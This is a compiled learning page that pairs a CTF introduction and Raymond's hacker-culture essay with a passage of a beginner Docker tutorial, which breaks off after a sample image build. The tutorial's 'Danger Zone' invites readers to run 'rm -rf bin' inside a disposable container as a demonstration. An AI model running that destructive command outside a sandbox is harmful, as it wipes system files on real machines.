About this knowledge base

CTF 101

CTF Introduction

Capture the Flag competitions, or CTFs, are a kind of computer security competition.

Teams of competitors (or just individuals) are pitted against each other in a test of computer security skills.

Very often CTFs are the beginning of one's cyber security career due to their team-building nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a weekend.

Origin of CTF

CTF's predecessor is a traditional networking technology competition between hackers, which originated at the 4th DEFCON in 1996.

The first CTF competitions (1996 - 2001) had no clear rules and no professionally built competition platform or environment. Teams had to prepare and defend their own targets while trying to break into each other's. The organizers were mostly non-professional volunteers who handled manual scoring requests from the participating teams.

The lack of automated back-end systems, the judges' limited technical competence, scoring delays and errors, unreliable networks, and improper configurations led to a great deal of controversy and dissatisfaction.

The "Modern" CTF Competition

A professional team is responsible for the competition platform, challenge design, event organization, and automated scoring system. Teams are required to submit applications and are selected by the DEFCON conference organizers.

The following features stand out for the three years of DEFCON CTF competitions organized by LegitBS.

The competition focuses on core competencies in low-level computer and system security; web vulnerability techniques are ignored entirely.
The competition environment spans multiple CPU instruction set architectures, operating systems, and programming languages.
"Zero-sum" scoring rules are used.
Teams are tested on a comprehensive range of skills: reverse engineering, vulnerability discovery, vulnerability exploitation, vulnerability patching and hardening, network traffic analysis, system security operations and maintenance, and security-oriented programming and debugging.

CTF Competition Types

Jeopardy is the format most commonly used in online qualifying rounds. In a Jeopardy CTF, teams participate over the Internet or an on-site network and earn points by solving cybersecurity challenges, either by interacting with an online environment or by analyzing files offline. As in ACM programming contests and informatics Olympiads, teams are ranked by total points and time.
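
As a rough illustration of ranking by total points and time, the sketch below sorts teams by total score and breaks ties in favor of the team whose last scoring submission came earlier. The tie-break rule, the team names, and the data layout are assumptions made for this example; real platforms may rank differently.

```python
from typing import NamedTuple


class TeamResult(NamedTuple):
    name: str        # hypothetical team name
    points: int      # total points earned
    last_solve: int  # time of the last scoring submission, in seconds since the start


def rank_teams(results: list[TeamResult]) -> list[str]:
    """Order teams by points (highest first), then by earlier last solve."""
    ordered = sorted(results, key=lambda r: (-r.points, r.last_solve))
    return [r.name for r in ordered]


if __name__ == "__main__":
    board = [
        TeamResult("alpha", 900, 7200),
        TeamResult("bravo", 1200, 9000),
        TeamResult("charlie", 900, 3600),
    ]
    print(rank_teams(board))
```

Here alpha and charlie are tied on points, so charlie ranks higher because its last solve came earlier.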

Jeopardy competitions usually award first blood, second blood, and third blood bonuses: the first three teams to solve a challenge earn extra points. This rewards the teams that solve a challenge first and also indirectly reflects a team's ability.
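
A minimal sketch of such a bonus scheme might look like the following. The bonus percentages (5%, 3%, 1%) and the function name are assumptions chosen for illustration; each competition defines its own values.

```python
def score_with_blood_bonus(
    base_points: int,
    solve_position: int,
    bonus_percent: tuple[int, ...] = (5, 3, 1),  # assumed bonuses for 1st, 2nd, 3rd solve
) -> int:
    """Return the points a team earns, including any early-solve bonus.

    solve_position is 1 for the first team to solve the challenge,
    2 for the second, and so on.
    """
    if solve_position < 1:
        raise ValueError("solve_position starts at 1")
    if solve_position <= len(bonus_percent):
        bonus = base_points * bonus_percent[solve_position - 1] // 100
        return base_points + bonus
    return base_points


if __name__ == "__main__":
    for position in range(1, 5):
        print(position, score_with_blood_bonus(100, position))
```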

Another popular scoring rule sets an initial score for each challenge and then gradually lowers it as more teams solve the challenge: the more teams solve it, the lower its score. The score eventually reaches a guaranteed minimum and stops dropping.

Challenges fall into six main categories: Web (web attack and defense), RE (reverse engineering), Pwn (binary exploitation), Crypto (cryptographic attacks), Mobile (mobile security), and Misc (miscellaneous security topics).
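
The decaying-score rule can be sketched as below. The linear decay and the specific numbers are assumptions for illustration only; actual platforms often use other decay curves.

```python
def dynamic_score(initial: int, minimum: int, decay_per_solve: int, solves: int) -> int:
    """Score of a challenge after `solves` teams have solved it.

    The value drops by `decay_per_solve` for each solve (an assumed linear
    rule) and never falls below `minimum`, the guaranteed score.
    """
    if solves < 0:
        raise ValueError("solves must be non-negative")
    return max(minimum, initial - decay_per_solve * solves)


if __name__ == "__main__":
    for solves in (0, 5, 50):
        print(solves, dynamic_score(500, 100, 20, solves))
```

With these example values the challenge starts at 500 points, loses 20 points per solve, and stops at 100.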

CTF Contest Contents

Because CTF challenges cover such a wide range, there are no clear boundaries on what may be tested. Current competition challenges, however, mostly fall into the common categories: Web (web attack and defense), RE (reverse engineering), Pwn (binary vulnerability exploitation), Crypto (cryptographic attacks), Mobile (mobile security), and Misc (miscellaneous security topics).

Web - Web Attack and Defense

This section introduces common vulnerabilities in web security, such as SQL injection, XSS, CSRF, file inclusion, file upload, code auditing, and PHP weak typing, along with common challenge types and solutions, and provides some commonly used tools.

RE - Reverse Engineering

This section introduces the common challenge types, tools and platforms, and solution approaches in reverse engineering. The advanced part covers common software protection, decompilation, anti-debugging, packing, and unpacking techniques.

Pwn - Binary Vulnerability Exploitation

Pwn challenges mainly test the discovery and exploitation of binary vulnerabilities, which requires some understanding of how the underlying operating system works. In CTF competitions, Pwn challenges mostly target the Linux platform.

Crypto - Cryptographic Attacks

Classical cryptography is interesting and diverse, while modern cryptography is highly secure and requires high algorithmic understanding.

Mobile - Mobile Security

This section introduces the common tools and main challenge types in Android reverse engineering, which often requires some knowledge of Android development. iOS reverse engineering challenges appear less often in CTF competitions, so they are covered only briefly.

Misc - Security Miscellaneous

This section uses the book "Online Ghost: The Autobiography of Mitnick, the World's Number One Hacker" (translated by Zhuge Jianwei) and some typical Misc challenges as entry points. It mainly covers information gathering, encoding analysis, forensic analysis, steganography analysis, and so on.

How To Become A Hacker

What Is a Hacker?

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mindset is not confined to this software-hacker culture. Some people apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is independent of the particular medium the hacker works in. But in the rest of this document, we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, and crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you, for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mindset of masters, not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path: look to the master, follow the master, walk with the master, see through the master, become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, and in pushing themselves past their physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one to make it as a hacker. Otherwise, you'll find your hacking energy is sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get the most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kind of authority to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like the ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitudes and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

Reference

https://ctf101.org/
http://www.catb.org/~esr/faqs/hacker-howto.html
https://ctf-wiki.org/

Docker for beginners

https://docker-curriculum.com/

by Prakhar Srivastav

Introduction

What is Docker?

Wikipedia defines Docker as

an open-source project that automates the deployment of software applications inside containers by providing an additional layer of abstraction and automation of OS-level virtualization on Linux.

Wow! That's a mouthful. In simpler words, Docker is a tool that allows developers, sys-admins, etc. to easily deploy their applications in a sandbox (called containers) to run on the host operating system i.e. Linux. The key benefit of Docker is that it allows users to package an application with all of its dependencies into a standardized unit for software development. Unlike virtual machines, containers do not have high overhead and hence enable more efficient usage of the underlying system and resources.

What are containers?

The industry standard today is to use Virtual Machines (VMs) to run software applications. VMs run applications inside a guest Operating System, which runs on virtual hardware powered by the server’s host OS.

VMs are great at providing full process isolation for applications: there are very few ways a problem in the host operating system can affect the software running in the guest operating system, and vice-versa. But this isolation comes at a great cost — the computational overhead spent virtualizing hardware for a guest OS to use is substantial.

Containers take a different approach: by leveraging the low-level mechanics of the host operating system, containers provide most of the isolation of virtual machines at a fraction of the computing power.

Why use containers?

Containers offer a logical packaging mechanism in which applications can be abstracted from the environment in which they run. This decoupling allows container-based applications to be deployed easily and consistently, regardless of whether the target environment is a private data center, the public cloud, or even a developer’s laptop. This gives developers the ability to create predictable environments that are isolated from the rest of the applications and can be run anywhere.

From an operations standpoint, apart from portability, containers also give more granular control over resources, which improves the efficiency of your infrastructure and can result in better utilization of your compute resources.

[Figure: Docker interest over time (Google Trends for Docker)]

Due to these benefits, containers (& Docker) have seen widespread adoption. Companies like Google, Facebook, Netflix, and Salesforce leverage containers to make large engineering teams more productive and to improve the utilization of computing resources. Google credited containers for eliminating the need for an entire data center.

What will this tutorial teach me?

This tutorial aims to be the one-stop shop for getting your hands dirty with Docker. Apart from demystifying the Docker landscape, it'll give you hands-on experience building and deploying your web apps on the Cloud. We'll be using Amazon Web Services to deploy a static website, and two dynamic web apps on EC2 using Elastic Beanstalk and Elastic Container Service. Even if you have no prior experience with deployments, this tutorial should be all you need to get started.

GETTING STARTED

This document contains a series of several sections, each of which explains a particular aspect of Docker. We will be typing commands (or writing code) in each section. All the code used in the tutorial is available in the GitHub repo.

Note: This tutorial uses version 18.05.0-ce of Docker. If you find any part of the tutorial incompatible with a future version, please raise an issue. Thanks!

Prerequisites

There are no specific skills needed for this tutorial beyond a basic comfort with the command line and using a text editor. This tutorial uses git clone to clone the repository locally. If you don't have Git installed on your system, either install it or remember to manually download the zip files from GitHub. Prior experience in developing web applications will be helpful but is not required. As we proceed further along the tutorial, we'll make use of a few cloud services. If you're interested in following along, please create an account on each of them (for example, Amazon Web Services, which this tutorial uses for deployment).

Setting up your computer

Getting all the tooling set up on your computer can be a daunting task, but thankfully, as Docker has become stable, getting it up and running on your favorite OS has become very easy.

Until a few releases ago, running Docker on OSX and Windows was quite a hassle. Lately, however, Docker has invested significantly in improving the onboarding experience for its users on these OSes, so running Docker is now a cakewalk. The getting started guide on Docker has detailed instructions for setting up Docker on Mac, Linux and Windows.

Once you are done installing Docker, test your Docker installation by running the following:

$ docker run hello-world

Hello from Docker.
This message shows that your installation appears to be working correctly.
...

HELLO WORLD

Playing with Busybox

Now that we have everything set up, it's time to get our hands dirty. In this section, we are going to run a Busybox container on our system and get a taste of the docker run command.

To get started, let's run the following in our terminal:

$ docker pull busybox

Note: Depending on how you've installed docker on your system, you might see a permission denied error after running the above command. If you're on a Mac, make sure the Docker engine is running. If you're on Linux, then prefix your docker commands with sudo. Alternatively, you can create a docker group to get rid of this issue.

The pull command fetches the busybox image from the Docker registry and saves it to our system. You can use the docker images command to see a list of all images on your system.

$ docker images
REPOSITORY              TAG                 IMAGE ID            CREATED             VIRTUAL SIZE
busybox                 latest              c51f86c28340        4 weeks ago         1.109 MB

Docker Run

Great! Let's now run a Docker container based on this image. To do that we are going to use the almighty docker run command.

$ docker run busybox

Wait, nothing happened! Is that a bug? Well, no. Behind the scenes, a lot of stuff happened. When you call run, the Docker client finds the image (busybox in this case), loads up the container and then runs a command in that container. When we ran docker run busybox, we didn't provide a command, so the container booted up, ran an empty command and then exited. Well, yeah - kind of a bummer. Let's try something more exciting.

$ docker run busybox echo "hello from busybox"
hello from busybox

Nice - finally we see some output. In this case, the Docker client dutifully ran the echo command in our busybox container and then exited it. As you may have noticed, all of that happened pretty quickly. Imagine booting up a virtual machine, running a command and then killing it. Now you know why they say containers are fast!

Ok, now it's time to see the docker ps command. The docker ps command shows you all containers that are currently running.

$ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES

Since no containers are running, we see a blank line. Let's try a more useful variant: docker ps -a

$ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES
305297d7a235        busybox             "uptime"            11 minutes ago      Exited (0) 11 minutes ago                       distracted_goldstine
ff0a5c3750b9        busybox             "sh"                12 minutes ago      Exited (0) 12 minutes ago                       elated_ramanujan
14e5bd11d164        hello-world         "/hello"            2 minutes ago       Exited (0) 2 minutes ago                        thirsty_euclid

So what we see above is a list of all containers that we ran. Do notice that the STATUS column shows that these containers exited a few minutes ago.

You're probably wondering if there is a way to run more than just one command in a container. Let's try that now:

$ docker run -it busybox sh
/ # ls
bin   dev   etc   home  proc  root  sys   tmp   usr   var
/ # uptime
 05:45:21 up  5:58,  0 users,  load average: 0.00, 0.01, 0.04

Running the run command with the -it flags attaches us to an interactive tty in the container. Now we can run as many commands in the container as we want. Take some time to run your favorite commands.

Danger Zone: If you're feeling particularly adventurous you can try rm -rf bin in the container. Make sure you run this command in the container and not on your laptop/desktop. Doing this will stop other commands such as ls and uptime from working. Once everything stops working, you can exit the container (type exit and press Enter) and then start it up again with the docker run -it busybox sh command. Since Docker creates a new container every time, everything should start working again.

That concludes a whirlwind tour of the mighty docker run command, which would most likely be the command you'll use most often. It makes sense to spend some time getting comfortable with it. To find out more about run, use docker run --help to see a list of all flags it supports. As we proceed further, we'll see a few more variants of docker run.

Before we move ahead though, let's quickly talk about deleting containers. We saw above that we can still see remnants of the container even after we've exited by running docker ps -a. Throughout this tutorial, you'll run docker run multiple times and leaving stray containers will eat up disk space. Hence, as a rule of thumb, I clean up containers once I'm done with them. To do that, you can run the docker rm command. Just copy the container IDs from above and paste them alongside the command.

$ docker rm 305297d7a235 ff0a5c3750b9
305297d7a235
ff0a5c3750b9

On deletion, you should see the IDs echoed back to you. If you have a bunch of containers to delete in one go, copy-pasting IDs can be tedious. In that case, you can simply run -

$ docker rm $(docker ps -a -q -f status=exited)

This command deletes all containers that have a status of exited. In case you're wondering, the -q flag returns only the container IDs and the -f flag filters output based on the conditions provided. One last thing that'll be useful is the --rm flag, which can be passed to docker run to automatically delete the container once it exits. For one-off docker runs, the --rm flag is very useful.
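
To make the filtering step concrete, here is a small Python sketch of the same idea: pick out the IDs of containers whose status is "Exited" from a container listing. It assumes the listing was produced with docker ps -a --format '{{.ID}} {{.Status}}' (one container per line, ID first); the function name and the sample data, including the running container, are hypothetical.

```python
def exited_container_ids(ps_output: str) -> list[str]:
    """Return the IDs of containers whose status starts with "Exited".

    Expects one container per line in the form "<id> <status text>".
    """
    ids = []
    for line in ps_output.splitlines():
        if not line.strip():
            continue  # skip blank lines
        container_id, _, status = line.strip().partition(" ")
        if status.startswith("Exited"):
            ids.append(container_id)
    return ids


if __name__ == "__main__":
    # Sample listing; the last entry is a made-up running container.
    sample = (
        "305297d7a235 Exited (0) 11 minutes ago\n"
        "ff0a5c3750b9 Exited (0) 12 minutes ago\n"
        "e61d12292d69 Up 3 minutes\n"
    )
    print(exited_container_ids(sample))
```

The resulting IDs are what you would pass to docker rm. In day-to-day use the shell one-liner above is simpler, and the sketch only shows what the filter selects.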

In later versions of Docker, the docker container prune command can be used to achieve the same effect.

$ docker container prune
WARNING! This will remove all stopped containers.
Are you sure you want to continue? [y/N] y
Deleted Containers:
4a7f7eebae0f63178aff7eb0aa39f0627a203ab2df258c1a00b456cf20063
f98f9c2aa1eaf727e4ec9c0283bcaa4762fbdba7f26191f26c97f64090360

Total reclaimed space: 212 B

Lastly, you can also delete images that you no longer need by running docker rmi.

Terminology

In the last section, we used a lot of Docker-specific jargon which might be confusing to some. So before we go further, let me clarify some terminology that is used frequently in the Docker ecosystem.

Images - The blueprints of our application which form the basis of containers. In the demo above, we used the docker pull command to download the busybox image.
Containers - Created from Docker images and run the actual application. We create a container using docker run which we did using the busybox image that we downloaded. A list of running containers can be seen using the docker ps command.
Docker Daemon - The background service running on the host that manages building, running and distributing Docker containers. The daemon is the process that runs in the operating system which clients talk to.
Docker Client - The command line tool that allows the user to interact with the daemon. More generally, there can be other forms of clients too, such as Kitematic, which provides a GUI to users.
Docker Hub - A registry of Docker images. You can think of the registry as a directory of all available Docker images. If required, one can host their own Docker registries and can use them for pulling images.

WEBAPPS WITH DOCKER

Great! So we have now looked at docker run, played with a Docker container and also got the hang of some terminology. Armed with all this knowledge, we are now ready to get to the real stuff, i.e. deploying web applications with Docker!

Static Sites

Let's start by taking baby-steps. The first thing we're going to look at is how we can run a dead-simple static website. We're going to pull a Docker image from Docker Hub, run the container and see how easy it is to run a webserver.

Let's begin. The image that we are going to use is a single-page website that I've already created for the purpose of this demo and hosted on the registry - prakhar1989/static-site. We can download and run the image directly in one go using docker run. As noted above, the --rm flag automatically removes the container when it exits and the -it flag specifies an interactive terminal, which makes it easier to kill the container with Ctrl+C (on Windows).

$ docker run --rm -it prakhar1989/static-site

Since the image doesn't exist locally, the client will first fetch the image from the registry and then run the image. If all goes well, you should see an "Nginx is running..." message in your terminal. Okay, now that the server is running, how do we see the website? What port is it running on? And more importantly, how do we access the container directly from our host machine? Hit Ctrl+C to stop the container.

Well, in this case, the client is not exposing any ports so we need to re-run the docker run command to publish ports. While we're at it, we should also find a way so that our terminal is not attached to the running container. This way, you can happily close your terminal and keep the container running. This is called detached mode.

$ docker run -d -P --name static-site prakhar1989/static-site
e61d12292d69556eabe2a44c16cbd54486b2527e2ce4f95438e504afb7b02810

In the above command, -d will detach our terminal, -P will publish all exposed ports to random ports and finally --name sets the name we want to give the container. Now we can see the ports by running the docker port [CONTAINER] command.

$ docker port static-site
80/tcp -> 0.0.0.0:32769
443/tcp -> 0.0.0.0:32768

You can open http://localhost:32769 in your browser.
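
If you want to script this step, the following sketch turns the docker port output shown above into a URL. It assumes each line has the form "<container port>/<protocol> -> <host ip>:<host port>"; the function names are hypothetical, and if the same container port appears on several lines the last one wins.

```python
def parse_port_mappings(port_output: str) -> dict[str, tuple[str, int]]:
    """Map each container port (e.g. "80/tcp") to its (host_ip, host_port)."""
    mappings = {}
    for line in port_output.splitlines():
        if "->" not in line:
            continue  # ignore anything that is not a mapping line
        container_port, host = (part.strip() for part in line.split("->", 1))
        host_ip, _, host_port = host.rpartition(":")
        mappings[container_port] = (host_ip, int(host_port))
    return mappings


def local_url(mappings: dict[str, tuple[str, int]], container_port: str = "80/tcp") -> str:
    """Build the localhost URL for a published container port."""
    _, host_port = mappings[container_port]
    return f"http://localhost:{host_port}"


if __name__ == "__main__":
    output = "80/tcp -> 0.0.0.0:32769\n443/tcp -> 0.0.0.0:32768\n"
    print(local_url(parse_port_mappings(output)))
```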

Note: If you're using docker-toolbox, then you might need to use docker-machine ip default to get the IP.

You can also specify a custom port to which the client will forward connections to the container.

$ docker run -p 8888:80 prakhar1989/static-site
Nginx is running...

To stop a detached container, run docker stop by giving the container ID. In this case, we can use the name static-site we used to start the container.

$ docker stop static-site
static-site

I'm sure you agree that was super simple. To deploy this on a real server you would just need to install Docker, and run the above Docker command. Now that you've seen how to run a webserver inside a Docker container, you must be wondering - how do I create my own Docker image? This is the question we'll be exploring in the next section.

Docker Images

We've looked at images before, but in this section we'll dive deeper into what Docker images are and build our own image! Lastly, we'll also use that image to run our application locally and finally deploy on AWS to share it with our friends! Excited? Great! Let's get started.

Docker images are the basis of containers. In the previous example, we pulled the Busybox image from the registry and asked the Docker client to run a container based on that image. To see the list of images that are available locally, use the docker images command.

$ docker images
REPOSITORY                      TAG                 IMAGE ID            CREATED             VIRTUAL SIZE
prakhar1989/catnip              latest              c7ffb5626a50        2 hours ago         697.9 MB
prakhar1989/static-site         latest              b270625a1631        21 hours ago        133.9 MB
python                          3-onbuild           cf4002b2c383        5 days ago          688.8 MB
martin/docker-cleanup-volumes   latest              b42990daaca2        7 weeks ago         22.14 MB
ubuntu                          latest              e9ae3c220b23        7 weeks ago         187.9 MB
busybox                         latest              c51f86c28340        9 weeks ago         1.109 MB
hello-world                     latest              0a6ba66e537a        11 weeks ago        960 B

The above gives a list of images that I've pulled from the registry, along with ones that I've created myself (we'll shortly see how). The TAG refers to a particular snapshot of the image and the IMAGE ID is the corresponding unique identifier for that image.

For simplicity, you can think of an image as akin to a git repository - images can be committed with changes and have multiple versions. If you don't provide a specific version number, the client defaults to latest. For example, you can pull a specific version of the ubuntu image:

$ docker pull ubuntu:18.04
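
The "defaults to latest" behavior can be illustrated with a short sketch that splits an image reference into a name and a tag. This is a simplified model written for this example, not Docker's own parser: it ignores digest references (name@sha256:...), and the registry address in the usage example is hypothetical.

```python
def split_image_reference(reference: str) -> tuple[str, str]:
    """Split "name[:tag]" into (name, tag), defaulting the tag to "latest"."""
    last_slash = reference.rfind("/")
    last_colon = reference.rfind(":")
    # A colon that appears before the last slash belongs to a registry
    # host:port prefix, not to a tag.
    if last_colon > last_slash:
        return reference[:last_colon], reference[last_colon + 1:]
    return reference, "latest"


if __name__ == "__main__":
    for ref in ("ubuntu:18.04", "busybox", "localhost:5000/app"):
        print(ref, "->", split_image_reference(ref))
```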

To get a new Docker image you can either get it from a registry (such as the Docker Hub) or create your own. There are tens of thousands of images available on Docker Hub. You can also search for images directly from the command line using docker search.

An important distinction to be aware of when it comes to images is the difference between base and child images.

Base images are images that have no parent image, usually images with an OS like ubuntu, busybox or debian.
Child images are images that build on base images and add additional functionality.

Then there are official and user images, which can be both base and child images.

Official images are images that are officially maintained and supported by the folks at Docker. These are typically one word long. In the list of images above, the python, ubuntu, busybox and hello-world images are official images.
User images are images created and shared by users like you and me. They build on base images and add additional functionality. Typically, these are formatted as user/image-name.
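To make the naming conventions above concrete, here is a minimal Python sketch that splits an image reference into its parts and fills in the default tag. The function name parse_image_ref is hypothetical, and the "official vs. user" guess is only the rule of thumb described above (no user/ prefix means official). It does not handle images hosted on other registries.

```python
def parse_image_ref(ref, default_tag="latest"):
    """Split a Docker Hub style reference such as 'user/name:tag'."""
    name, sep, tag = ref.rpartition(":")
    if not sep or "/" in tag:
        # No tag was given, so fall back to the default one.
        name, tag = ref, default_tag
    user, _, repository = name.rpartition("/")
    return {
        "user": user or None,
        "repository": repository,
        "tag": tag,
        # Heuristic from the text: official images have no user/ prefix.
        "kind": "user" if user else "official",
    }


print(parse_image_ref("ubuntu:18.04"))
print(parse_image_ref("prakhar1989/catnip"))
```

The second call shows the default at work: no tag is given, so the tag comes back as latest.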

Our First Image

Now that we have a better understanding of images, it's time to create our own. Our goal in this section will be to create an image that sandboxes a simple Flask application. For the purposes of this workshop, I've already created a fun little Flask app that displays a random cat .gif every time it is loaded - because you know, who doesn't like cats? If you haven't already, please go ahead and clone the repository locally like so -

$ git clone https://github.com/prakhar1989/docker-curriculum.git
$ cd docker-curriculum/flask-app

This should be cloned on the machine where you are running the docker commands and not inside a docker container.

The next step now is to create an image with this web app. As mentioned above, all user images are based on a base image. Since our application is written in Python, the base image we're going to use will be Python 3.

Dockerfile

A Dockerfile is a simple text file that contains a list of commands that the Docker client calls while creating an image. It's a simple way to automate the image creation process. The best part is that the commands you write in a Dockerfile are almost identical to their equivalent Linux commands. This means you don't really have to learn new syntax to create your own dockerfiles.

The application directory does contain a Dockerfile, but since we're doing this for the first time, we'll create one from scratch. To start, create a new blank file in your favorite text editor and save it in the same folder as the Flask app under the name Dockerfile.

We start with specifying our base image. Use the FROM keyword to do that -

FROM python:3.8

The next step usually is to write the commands of copying the files and installing the dependencies. First, we set a working directory and then copy all the files for our app.

# set a directory for the app
WORKDIR /usr/src/app

# copy all the files to the container
COPY . .

Now that we have the files, we can install the dependencies.

# install dependencies
RUN pip install --no-cache-dir -r requirements.txt

The next thing we need to specify is the port number that needs to be exposed. Since our flask app is running on port 5000, that's what we'll indicate.

EXPOSE 5000

The last step is to write the command for running the application, which is simply - python ./app.py. We use the CMD command to do that -

CMD ["python", "./app.py"]

The primary purpose of CMD is to tell the container which command it should run when it is started. With that, our Dockerfile is now ready. This is how it looks -

FROM python:3.8

# set a directory for the app
WORKDIR /usr/src/app

# copy all the files to the container
COPY . .

# install dependencies
RUN pip install --no-cache-dir -r requirements.txt

# define the port number the container should expose
EXPOSE 5000

# run the command
CMD ["python", "./app.py"]
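To see how regular the Dockerfile format is, here is a small Python sketch that reads the file above as a list of (instruction, arguments) pairs. It is only an illustration: parse_dockerfile is a hypothetical helper, not part of Docker, and it ignores features such as line continuations.

```python
import json


def parse_dockerfile(text):
    """Return (INSTRUCTION, arguments) pairs, skipping blanks and comments."""
    steps = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        instruction, _, args = line.partition(" ")
        steps.append((instruction.upper(), args.strip()))
    return steps


DOCKERFILE = """\
FROM python:3.8

# set a directory for the app
WORKDIR /usr/src/app

# copy all the files to the container
COPY . .

# install dependencies
RUN pip install --no-cache-dir -r requirements.txt

# define the port number the container should expose
EXPOSE 5000

# run the command
CMD ["python", "./app.py"]
"""

steps = parse_dockerfile(DOCKERFILE)
for instruction, args in steps:
    print(f"{instruction:8} {args}")

# The bracketed (exec) form of CMD is a JSON array of arguments.
command = json.loads(steps[-1][1])
print(command)
```

Each non-comment line becomes one build step, which is why the build output lists the instructions one by one.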

Now that we have our Dockerfile, we can build our image. The docker build command does the heavy-lifting of creating a Docker image from a Dockerfile.

The docker build command is quite simple - it takes an optional tag name with -t and the location of the directory containing the Dockerfile. The output below shows what running it looks like. Before you run the command yourself (don't forget the period at the end), make sure to replace yourusername with your own username. This should be the same username you created when you registered on Docker Hub. If you haven't done that yet, please go ahead and create an account.

$ docker build -t yourusername/catnip .
Sending build context to Docker daemon 8.704 kB
Step 1 : FROM python:3.8
# Executing 3 build triggers...
Step 1 : COPY requirements.txt /usr/src/app/
 ---> Using cache
Step 1 : RUN pip install --no-cache-dir -r requirements.txt
 ---> Using cache
Step 1 : COPY . /usr/src/app
 ---> 1d61f639ef9e
Removing intermediate container 4de6ddf5528c
Step 2 : EXPOSE 5000
 ---> Running in 12cfcf6d67ee
 ---> f423c2f179d1
Removing intermediate container 12cfcf6d67ee
Step 3 : CMD python ./app.py
 ---> Running in f01401a5ace9
 ---> 13e87ed1fbc2
Removing intermediate container f01401a5ace9
Successfully built 13e87ed1fbc2

